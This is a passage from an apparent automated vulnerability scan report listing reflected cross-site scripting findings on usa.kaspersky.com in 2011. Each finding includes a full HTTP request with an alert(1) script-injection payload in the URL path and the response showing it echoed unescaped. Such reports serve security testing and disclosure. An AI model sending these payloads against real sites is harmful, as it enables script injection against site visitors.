The value of REST URL parameter 4 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 9c637"><script>alert(1)</script>fbc1902e072 was submitted in the REST URL parameter 4. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /sites/default/files/9c637"><script>alert(1)</script>fbc1902e072 HTTP/1.1
Host: usa.kaspersky.com
Proxy-Connection: keep-alive
Accept: */*
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.202 Safari/535.1
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: s_cc=true; gpv_pageName=Homepage; s_nr=1319387187420-New; s_sq=%5B%5BB%5D%5D; __utma=205612169.766366246.1319387189.1319387189.1319387189.1; __utmb=205612169.1.10.1319387189; __utmc=205612169; __utmz=205612169.1319387189.1.1.utmcsr=av-comparatives.org|utmccn=(referral)|utmcmd=referral|utmcct=/; s_vi=[CS]v1|2752201A851585B0-400001712000075D[CE]

Response

HTTP/1.1 404 Not Found
Server: Apache
Cache-Control: public, max-age=21600
Last-Modified: Sun, 23 Oct 2011 16:28:45 +0000
Expires: Sun, 11 Mar 1984 12:00:00 GMT
Vary: Cookie,Accept-Encoding
ETag: "1319387325"
Content-Type: text/html; charset=utf-8
Content-Length: 39351
Date: Sun, 23 Oct 2011 16:28:59 GMT
X-Varnish: 1652544165
Age: 0
Via: 1.1 varnish
Connection: keep-alive
X-Varnish-Cache: MISS

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en" dir="ltr" xmlns:og="ht
...[SNIP]...
<link rel="canonical" href="http://usa.kaspersky.com/sites/default/files/9c637"><script>alert(1)</script>fbc1902e072" />
...[SNIP]...

1.46. http://usa.kaspersky.com/sites/default/files/kaspersky_usatheme_favicon.ico [REST URL parameter 4] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://usa.kaspersky.com
Path:	/sites/default/files/kaspersky_usatheme_favicon.ico

Issue detail

The value of REST URL parameter 4 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload b7bf8"-alert(1)-"fed9f393e7c was submitted in the REST URL parameter 4. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Request

GET /sites/default/files/b7bf8"-alert(1)-"fed9f393e7c HTTP/1.1
Host: usa.kaspersky.com
Proxy-Connection: keep-alive
Accept: */*
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.202 Safari/535.1
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: s_cc=true; gpv_pageName=Homepage; s_nr=1319387187420-New; s_sq=%5B%5BB%5D%5D; __utma=205612169.766366246.1319387189.1319387189.1319387189.1; __utmb=205612169.1.10.1319387189; __utmc=205612169; __utmz=205612169.1319387189.1.1.utmcsr=av-comparatives.org|utmccn=(referral)|utmcmd=referral|utmcct=/; s_vi=[CS]v1|2752201A851585B0-400001712000075D[CE]

Response

HTTP/1.1 404 Not Found
Server: Apache
Cache-Control: public, max-age=21600
Last-Modified: Sun, 23 Oct 2011 16:29:15 +0000
Expires: Sun, 11 Mar 1984 12:00:00 GMT
Vary: Cookie,Accept-Encoding
ETag: "1319387355"
Content-Type: text/html; charset=utf-8
Content-Length: 40144
Date: Sun, 23 Oct 2011 16:29:23 GMT
X-Varnish: 1652546013
Age: 0
Via: 1.1 varnish
Connection: keep-alive
X-Varnish-Cache: MISS

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en" dir="ltr" xmlns:og="ht
...[SNIP]...
4 = " Thank You"; }
s.pageName = s.prop4;
s.eVar44 = s.pageName;
s.hier1 = s.pageName;
s.channel = s.prop1;
s.server=location.hostname;
s.pageName="404:http://usa.kaspersky.com/sites/default/files/b7bf8"-alert(1)-"fed9f393e7c";

/************* DO NOT ALTER ANYTHING BELOW THIS LINE ! **************/
var s_code=s.t();if(s_code)document.write(s_code)//-->
...[SNIP]...

1.47. http://usa.kaspersky.com/sites/usa.kaspersky.com/files/css_injector_143.css [REST URL parameter 1] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://usa.kaspersky.com
Path:	/sites/usa.kaspersky.com/files/css_injector_143.css

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload d8c6d"><script>alert(1)</script>1bca9c0c0c was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /sitesd8c6d"><script>alert(1)</script>1bca9c0c0c/usa.kaspersky.com/files/css_injector_143.css?3 HTTP/1.1
Host: usa.kaspersky.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.202 Safari/535.1
Accept: text/css,*/*;q=0.1
Referer: http://usa.kaspersky.com/products-services/home-computer-security/one?ICID=INT1674070
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: s_cc=true; __utma=205612169.766366246.1319387189.1319387189.1319387189.1; __utmb=205612169.1.10.1319387189; __utmc=205612169; __utmz=205612169.1319387189.1.1.utmcsr=av-comparatives.org|utmccn=(referral)|utmcmd=referral|utmcct=/; s_vi=[CS]v1|2752201A851585B0-400001712000075D[CE]; gpv_pageName=Homepage; s_nr=1319387320050-New; s_sq=kaspersky-usa%3D%2526pid%253DHomepage%2526pidt%253D1%2526oid%253Dhttp%25253A%25252F%25252Fusa.kaspersky.com%25252Fproducts-services%25252Fhome-computer-security%25252Fone%25253FICID%25253DINT1674070%2526ot%253DA

Response

HTTP/1.1 404 Not Found
Server: Apache
Cache-Control: public, max-age=21600
Last-Modified: Sun, 23 Oct 2011 16:35:17 +0000
Expires: Sun, 11 Mar 1984 12:00:00 GMT
Vary: Cookie,Accept-Encoding
ETag: "1319387717"
Content-Type: text/html; charset=utf-8
Content-Length: 37540
Date: Sun, 23 Oct 2011 16:35:23 GMT
X-Varnish: 1652563752
Age: 0
Via: 1.1 varnish
Connection: keep-alive
X-Varnish-Cache: MISS

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en" dir="ltr" xmlns:og="ht
...[SNIP]...
<link rel="canonical" href="http://usa.kaspersky.com/sitesd8c6d"><script>alert(1)</script>1bca9c0c0c/usa.kaspersky.com/files/css_injector_143.css?3" />
...[SNIP]...

1.48. http://usa.kaspersky.com/sites/usa.kaspersky.com/files/css_injector_143.css [REST URL parameter 1] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://usa.kaspersky.com
Path:	/sites/usa.kaspersky.com/files/css_injector_143.css

Issue detail

The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload e5727"-alert(1)-"7f740f6e61d was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Request

GET /sitese5727"-alert(1)-"7f740f6e61d/usa.kaspersky.com/files/css_injector_143.css?3 HTTP/1.1
Host: usa.kaspersky.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.202 Safari/535.1
Accept: text/css,*/*;q=0.1
Referer: http://usa.kaspersky.com/products-services/home-computer-security/one?ICID=INT1674070
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: s_cc=true; __utma=205612169.766366246.1319387189.1319387189.1319387189.1; __utmb=205612169.1.10.1319387189; __utmc=205612169; __utmz=205612169.1319387189.1.1.utmcsr=av-comparatives.org|utmccn=(referral)|utmcmd=referral|utmcct=/; s_vi=[CS]v1|2752201A851585B0-400001712000075D[CE]; gpv_pageName=Homepage; s_nr=1319387320050-New; s_sq=kaspersky-usa%3D%2526pid%253DHomepage%2526pidt%253D1%2526oid%253Dhttp%25253A%25252F%25252Fusa.kaspersky.com%25252Fproducts-services%25252Fhome-computer-security%25252Fone%25253FICID%25253DINT1674070%2526ot%253DA

Response

HTTP/1.1 404 Not Found
Server: Apache
Cache-Control: public, max-age=21600
Last-Modified: Sun, 23 Oct 2011 16:35:34 +0000
Expires: Sun, 11 Mar 1984 12:00:00 GMT
Vary: Cookie,Accept-Encoding
ETag: "1319387734"
Content-Type: text/html; charset=utf-8
Content-Length: 39506
Date: Sun, 23 Oct 2011 16:35:40 GMT
X-Varnish: 1652565073
Age: 0
Via: 1.1 varnish
Connection: keep-alive
X-Varnish-Cache: MISS

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en" dir="ltr" xmlns:og="ht
...[SNIP]...
'yes') { s.prop4 = " Thank You"; }
s.pageName = s.prop4;
s.eVar44 = s.pageName;
s.hier1 = s.pageName;
s.channel = s.prop1;
s.server=location.hostname;
s.pageName="404:http://usa.kaspersky.com/sitese5727"-alert(1)-"7f740f6e61d/usa.kaspersky.com/files/css_injector_143.css?3";

/************* DO NOT ALTER ANYTHING BELOW THIS LINE ! **************/
var s_code=s.t();if(s_code)document.write(s_code)//-->
...[SNIP]...

1.49. http://usa.kaspersky.com/sites/usa.kaspersky.com/files/css_injector_143.css [REST URL parameter 2] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://usa.kaspersky.com
Path:	/sites/usa.kaspersky.com/files/css_injector_143.css

Issue detail

The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 26ace"><script>alert(1)</script>bec8bb4acea was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /sites/usa.kaspersky.com26ace"><script>alert(1)</script>bec8bb4acea/files/css_injector_143.css?3 HTTP/1.1
Host: usa.kaspersky.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.202 Safari/535.1
Accept: text/css,*/*;q=0.1
Referer: http://usa.kaspersky.com/products-services/home-computer-security/one?ICID=INT1674070
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: s_cc=true; __utma=205612169.766366246.1319387189.1319387189.1319387189.1; __utmb=205612169.1.10.1319387189; __utmc=205612169; __utmz=205612169.1319387189.1.1.utmcsr=av-comparatives.org|utmccn=(referral)|utmcmd=referral|utmcct=/; s_vi=[CS]v1|2752201A851585B0-400001712000075D[CE]; gpv_pageName=Homepage; s_nr=1319387320050-New; s_sq=kaspersky-usa%3D%2526pid%253DHomepage%2526pidt%253D1%2526oid%253Dhttp%25253A%25252F%25252Fusa.kaspersky.com%25252Fproducts-services%25252Fhome-computer-security%25252Fone%25253FICID%25253DINT1674070%2526ot%253DA

Response

HTTP/1.1 404 Not Found
Server: Apache
Cache-Control: public, max-age=21600
Last-Modified: Sun, 23 Oct 2011 16:36:08 +0000
Expires: Sun, 11 Mar 1984 12:00:00 GMT
Vary: Cookie,Accept-Encoding
ETag: "1319387768"
Content-Type: text/html; charset=utf-8
Content-Length: 37522
Date: Sun, 23 Oct 2011 16:36:16 GMT
X-Varnish: 1652566502
Age: 0
Via: 1.1 varnish
Connection: keep-alive
X-Varnish-Cache: MISS

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en" dir="ltr" xmlns:og="ht
...[SNIP]...
<link rel="canonical" href="http://usa.kaspersky.com/sites/usa.kaspersky.com26ace"><script>alert(1)</script>bec8bb4acea/files/css_injector_143.css?3" />
...[SNIP]...

1.50. http://usa.kaspersky.com/sites/usa.kaspersky.com/files/css_injector_143.css [REST URL parameter 2] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://usa.kaspersky.com
Path:	/sites/usa.kaspersky.com/files/css_injector_143.css

Issue detail

The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 63551"-alert(1)-"6631431a643 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Request

GET /sites/usa.kaspersky.com63551"-alert(1)-"6631431a643/files/css_injector_143.css?3 HTTP/1.1
Host: usa.kaspersky.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.202 Safari/535.1
Accept: text/css,*/*;q=0.1
Referer: http://usa.kaspersky.com/products-services/home-computer-security/one?ICID=INT1674070
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: s_cc=true; __utma=205612169.766366246.1319387189.1319387189.1319387189.1; __utmb=205612169.1.10.1319387189; __utmc=205612169; __utmz=205612169.1319387189.1.1.utmcsr=av-comparatives.org|utmccn=(referral)|utmcmd=referral|utmcct=/; s_vi=[CS]v1|2752201A851585B0-400001712000075D[CE]; gpv_pageName=Homepage; s_nr=1319387320050-New; s_sq=kaspersky-usa%3D%2526pid%253DHomepage%2526pidt%253D1%2526oid%253Dhttp%25253A%25252F%25252Fusa.kaspersky.com%25252Fproducts-services%25252Fhome-computer-security%25252Fone%25253FICID%25253DINT1674070%2526ot%253DA

Response

HTTP/1.1 404 Not Found
Server: Apache
Cache-Control: public, max-age=21600
Last-Modified: Sun, 23 Oct 2011 16:36:31 +0000
Expires: Sun, 11 Mar 1984 12:00:00 GMT
Vary: Cookie,Accept-Encoding
ETag: "1319387791"
Content-Type: text/html; charset=utf-8
Content-Length: 38720
Date: Sun, 23 Oct 2011 16:36:35 GMT
X-Varnish: 1652567744
Age: 0
Via: 1.1 varnish
Connection: keep-alive
X-Varnish-Cache: MISS

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en" dir="ltr" xmlns:og="ht
...[SNIP]...
" Thank You"; }
s.pageName = s.prop4;
s.eVar44 = s.pageName;
s.hier1 = s.pageName;
s.channel = s.prop1;
s.server=location.hostname;
s.pageName="404:http://usa.kaspersky.com/sites/usa.kaspersky.com63551"-alert(1)-"6631431a643/files/css_injector_143.css?3";

/************* DO NOT ALTER ANYTHING BELOW THIS LINE ! **************/
var s_code=s.t();if(s_code)document.write(s_code)//-->
...[SNIP]...

1.51. http://usa.kaspersky.com/sites/usa.kaspersky.com/files/css_injector_143.css [REST URL parameter 3] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://usa.kaspersky.com
Path:	/sites/usa.kaspersky.com/files/css_injector_143.css

Issue detail

The value of REST URL parameter 3 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload a54eb"-alert(1)-"d6042cb5076 was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Request

GET /sites/usa.kaspersky.com/filesa54eb"-alert(1)-"d6042cb5076/css_injector_143.css?3 HTTP/1.1
Host: usa.kaspersky.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.202 Safari/535.1
Accept: text/css,*/*;q=0.1
Referer: http://usa.kaspersky.com/products-services/home-computer-security/one?ICID=INT1674070
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: s_cc=true; __utma=205612169.766366246.1319387189.1319387189.1319387189.1; __utmb=205612169.1.10.1319387189; __utmc=205612169; __utmz=205612169.1319387189.1.1.utmcsr=av-comparatives.org|utmccn=(referral)|utmcmd=referral|utmcct=/; s_vi=[CS]v1|2752201A851585B0-400001712000075D[CE]; gpv_pageName=Homepage; s_nr=1319387320050-New; s_sq=kaspersky-usa%3D%2526pid%253DHomepage%2526pidt%253D1%2526oid%253Dhttp%25253A%25252F%25252Fusa.kaspersky.com%25252Fproducts-services%25252Fhome-computer-security%25252Fone%25253FICID%25253DINT1674070%2526ot%253DA

Response

HTTP/1.1 404 Not Found
Server: Apache
Cache-Control: public, max-age=21600
Last-Modified: Sun, 23 Oct 2011 16:37:09 +0000
Expires: Sun, 11 Mar 1984 12:00:00 GMT
Vary: Cookie,Accept-Encoding
ETag: "1319387829"
Content-Type: text/html; charset=utf-8
Content-Length: 40324
Date: Sun, 23 Oct 2011 16:37:14 GMT
X-Varnish: 1652569635
Age: 0
Via: 1.1 varnish
Connection: keep-alive
X-Varnish-Cache: MISS

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en" dir="ltr" xmlns:og="ht
...[SNIP]...
nk You"; }
s.pageName = s.prop4;
s.eVar44 = s.pageName;
s.hier1 = s.pageName;
s.channel = s.prop1;
s.server=location.hostname;
s.pageName="404:http://usa.kaspersky.com/sites/usa.kaspersky.com/filesa54eb"-alert(1)-"d6042cb5076/css_injector_143.css?3";

/************* DO NOT ALTER ANYTHING BELOW THIS LINE ! **************/
var s_code=s.t();if(s_code)document.write(s_code)//-->
...[SNIP]...

1.52. http://usa.kaspersky.com/sites/usa.kaspersky.com/files/css_injector_143.css [REST URL parameter 3] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://usa.kaspersky.com
Path:	/sites/usa.kaspersky.com/files/css_injector_143.css

Issue detail

The value of REST URL parameter 3 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 458a8"><script>alert(1)</script>6ec87230500 was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /sites/usa.kaspersky.com/files458a8"><script>alert(1)</script>6ec87230500/css_injector_143.css?3 HTTP/1.1
Host: usa.kaspersky.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.202 Safari/535.1
Accept: text/css,*/*;q=0.1
Referer: http://usa.kaspersky.com/products-services/home-computer-security/one?ICID=INT1674070
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: s_cc=true; __utma=205612169.766366246.1319387189.1319387189.1319387189.1; __utmb=205612169.1.10.1319387189; __utmc=205612169; __utmz=205612169.1319387189.1.1.utmcsr=av-comparatives.org|utmccn=(referral)|utmcmd=referral|utmcct=/; s_vi=[CS]v1|2752201A851585B0-400001712000075D[CE]; gpv_pageName=Homepage; s_nr=1319387320050-New; s_sq=kaspersky-usa%3D%2526pid%253DHomepage%2526pidt%253D1%2526oid%253Dhttp%25253A%25252F%25252Fusa.kaspersky.com%25252Fproducts-services%25252Fhome-computer-security%25252Fone%25253FICID%25253DINT1674070%2526ot%253DA

Response

HTTP/1.1 404 Not Found
Server: Apache
Cache-Control: public, max-age=21600
Last-Modified: Sun, 23 Oct 2011 16:36:50 +0000
Expires: Sun, 11 Mar 1984 12:00:00 GMT
Vary: Cookie,Accept-Encoding
ETag: "1319387810"
Content-Type: text/html; charset=utf-8
Content-Length: 40475
Date: Sun, 23 Oct 2011 16:36:55 GMT
X-Varnish: 1652568800
Age: 0
Via: 1.1 varnish
Connection: keep-alive
X-Varnish-Cache: MISS

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en" dir="ltr" xmlns:og="ht
...[SNIP]...
<link rel="canonical" href="http://usa.kaspersky.com/sites/usa.kaspersky.com/files458a8"><script>alert(1)</script>6ec87230500/css_injector_143.css?3" />
...[SNIP]...

1.53. http://usa.kaspersky.com/sites/usa.kaspersky.com/files/css_injector_143.css [REST URL parameter 4] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://usa.kaspersky.com
Path:	/sites/usa.kaspersky.com/files/css_injector_143.css

Issue detail

The value of REST URL parameter 4 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 3512c"-alert(1)-"148586c319a was submitted in the REST URL parameter 4. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Request

GET /sites/usa.kaspersky.com/files/css_injector_143.css3512c"-alert(1)-"148586c319a?3 HTTP/1.1
Host: usa.kaspersky.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.202 Safari/535.1
Accept: text/css,*/*;q=0.1
Referer: http://usa.kaspersky.com/products-services/home-computer-security/one?ICID=INT1674070
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: s_cc=true; __utma=205612169.766366246.1319387189.1319387189.1319387189.1; __utmb=205612169.1.10.1319387189; __utmc=205612169; __utmz=205612169.1319387189.1.1.utmcsr=av-comparatives.org|utmccn=(referral)|utmcmd=referral|utmcct=/; s_vi=[CS]v1|2752201A851585B0-400001712000075D[CE]; gpv_pageName=Homepage; s_nr=1319387320050-New; s_sq=kaspersky-usa%3D%2526pid%253DHomepage%2526pidt%253D1%2526oid%253Dhttp%25253A%25252F%25252Fusa.kaspersky.com%25252Fproducts-services%25252Fhome-computer-security%25252Fone%25253FICID%25253DINT1674070%2526ot%253DA

Response

HTTP/1.1 404 Not Found
Server: Apache
Cache-Control: public, max-age=21600
Last-Modified: Sun, 23 Oct 2011 16:37:49 +0000
Expires: Sun, 11 Mar 1984 12:00:00 GMT
Vary: Cookie,Accept-Encoding
ETag: "1319387869"
Content-Type: text/html; charset=utf-8
Content-Length: 39279
Date: Sun, 23 Oct 2011 16:37:52 GMT
X-Varnish: 1652571684
Age: 0
Via: 1.1 varnish
Connection: keep-alive
X-Varnish-Cache: MISS

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en" dir="ltr" xmlns:og="ht
...[SNIP]...
= s.prop4;
s.eVar44 = s.pageName;
s.hier1 = s.pageName;
s.channel = s.prop1;
s.server=location.hostname;
s.pageName="404:http://usa.kaspersky.com/sites/usa.kaspersky.com/files/css_injector_143.css3512c"-alert(1)-"148586c319a?3";

/************* DO NOT ALTER ANYTHING BELOW THIS LINE ! **************/
var s_code=s.t();if(s_code)document.write(s_code)//-->
...[SNIP]...

1.54. http://usa.kaspersky.com/sites/usa.kaspersky.com/files/css_injector_143.css [REST URL parameter 4] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://usa.kaspersky.com
Path:	/sites/usa.kaspersky.com/files/css_injector_143.css

Issue detail

The value of REST URL parameter 4 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 47e25"><script>alert(1)</script>540a02d78bf was submitted in the REST URL parameter 4. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /sites/usa.kaspersky.com/files/css_injector_143.css47e25"><script>alert(1)</script>540a02d78bf?3 HTTP/1.1
Host: usa.kaspersky.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.202 Safari/535.1
Accept: text/css,*/*;q=0.1
Referer: http://usa.kaspersky.com/products-services/home-computer-security/one?ICID=INT1674070
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: s_cc=true; __utma=205612169.766366246.1319387189.1319387189.1319387189.1; __utmb=205612169.1.10.1319387189; __utmc=205612169; __utmz=205612169.1319387189.1.1.utmcsr=av-comparatives.org|utmccn=(referral)|utmcmd=referral|utmcct=/; s_vi=[CS]v1|2752201A851585B0-400001712000075D[CE]; gpv_pageName=Homepage; s_nr=1319387320050-New; s_sq=kaspersky-usa%3D%2526pid%253DHomepage%2526pidt%253D1%2526oid%253Dhttp%25253A%25252F%25252Fusa.kaspersky.com%25252Fproducts-services%25252Fhome-computer-security%25252Fone%25253FICID%25253DINT1674070%2526ot%253DA

Response

HTTP/1.1 404 Not Found
Server: Apache
Cache-Control: public, max-age=21600
Last-Modified: Sun, 23 Oct 2011 16:37:35 +0000
Expires: Sun, 11 Mar 1984 12:00:00 GMT
Vary: Cookie,Accept-Encoding
ETag: "1319387855"
Content-Type: text/html; charset=utf-8
Content-Length: 37875
Date: Sun, 23 Oct 2011 16:37:37 GMT
X-Varnish: 1652570960
Age: 0
Via: 1.1 varnish
Connection: keep-alive
X-Varnish-Cache: MISS

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en" dir="ltr" xmlns:og="ht
...[SNIP]...
<link rel="canonical" href="http://usa.kaspersky.com/sites/usa.kaspersky.com/files/css_injector_143.css47e25"><script>alert(1)</script>540a02d78bf?3" />
...[SNIP]...

1.55. http://usa.kaspersky.com/sites/usa.kaspersky.com/files/css_injector_144.css [REST URL parameter 1] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://usa.kaspersky.com
Path:	/sites/usa.kaspersky.com/files/css_injector_144.css

Issue detail

The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload de1b1"-alert(1)-"b94c665e0b4 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Request

GET /sitesde1b1"-alert(1)-"b94c665e0b4/usa.kaspersky.com/files/css_injector_144.css?3 HTTP/1.1
Host: usa.kaspersky.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.202 Safari/535.1
Accept: text/css,*/*;q=0.1
Referer: http://usa.kaspersky.com/products-services/home-computer-security/one?ICID=INT1674070
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: s_cc=true; __utma=205612169.766366246.1319387189.1319387189.1319387189.1; __utmb=205612169.1.10.1319387189; __utmc=205612169; __utmz=205612169.1319387189.1.1.utmcsr=av-comparatives.org|utmccn=(referral)|utmcmd=referral|utmcct=/; s_vi=[CS]v1|2752201A851585B0-400001712000075D[CE]; gpv_pageName=Homepage; s_nr=1319387320050-New; s_sq=kaspersky-usa%3D%2526pid%253DHomepage%2526pidt%253D1%2526oid%253Dhttp%25253A%25252F%25252Fusa.kaspersky.com%25252Fproducts-services%25252Fhome-computer-security%25252Fone%25253FICID%25253DINT1674070%2526ot%253DA

Response

HTTP/1.1 404 Not Found
Server: Apache
Cache-Control: public, max-age=21600
Last-Modified: Sun, 23 Oct 2011 16:34:10 +0000
Expires: Sun, 11 Mar 1984 12:00:00 GMT
Vary: Cookie,Accept-Encoding
ETag: "1319387650"
Content-Type: text/html; charset=utf-8
Content-Length: 39506
Date: Sun, 23 Oct 2011 16:34:36 GMT
X-Varnish: 1652559100
Age: 0
Via: 1.1 varnish
Connection: keep-alive
X-Varnish-Cache: MISS

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en" dir="ltr" xmlns:og="ht
...[SNIP]...
'yes') { s.prop4 = " Thank You"; }
s.pageName = s.prop4;
s.eVar44 = s.pageName;
s.hier1 = s.pageName;
